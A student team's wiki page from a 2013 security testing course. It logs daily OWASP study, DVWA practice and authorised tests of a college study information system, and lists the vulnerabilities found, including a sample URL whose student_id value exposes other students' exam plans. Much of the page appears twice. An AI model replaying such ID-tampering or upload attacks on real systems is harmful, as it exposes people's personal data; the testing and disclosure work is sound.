*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feedback==
===Feedback from Sten Aus===
* '''What I did like: '''
** I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time.
** Multicultural groups, where all the participants are from different countries.
** I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.
** I enjoyed out-of-schedule activities. For example, I liked visiting Skype, TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling "competition" and it was fun!

* '''What I did not like: ''
** I did not like that we had to sit so much in lectures. :) (Wanted to stretch some more)
** From time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===
* '''What I did like:'''
** Working in a team on a real-life problem.
** Practising problem-solving and working as a team.
** Learned a lot of new stuff.
** Organisation - well done
** Had a wonderful team!

* '''What I did not like:'''
** A couple of days short of time - as usual...

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===
* '''What I did like:'''
** It was nice to meet new people and get new friends from different cultures.
** Also all the events that was arranged were very funny, specially sauna-event!
** Visiting Skype office was something that you don’t get to do everyday!
** Free food!
** Everything was well organized and teachers were truly interested about this intensive course!

* '''What I did not like:'''
** Too long studying/working days.

===Feedback from Mika Salmela===
* '''What I did like:'''
** First of all, i would like thank you everyone!
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!

* '''What I did not like:'''
** Not so much free time T.T

===Feedback from Kęstutis Tautvydas===
* '''What I did like:'''
** Accommodation
** The equipment we used
** The capabilities and expertise of the professors
** The overall quality of teaching
** The expected learning outcomes
** The activities besides the general course
** Friendly environment
** Working in teams. Thanks guys!
** Free water
** Tasty food

* '''What I did not like:'''
** To long working hours

===Feedback from Jurij Lukjančikov===
* '''What I did like:'''
** Working in teams.
** Meeting new people.
** Seeing new places.
** Learning new things.

* '''What I did not like:'''
** Too long studying/working days.
** Brainstorming after whole day of lectures.

Security

2013-04-05T08:41:02Z

Saus: /* Feedback from Kęstutis Tautvydas */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
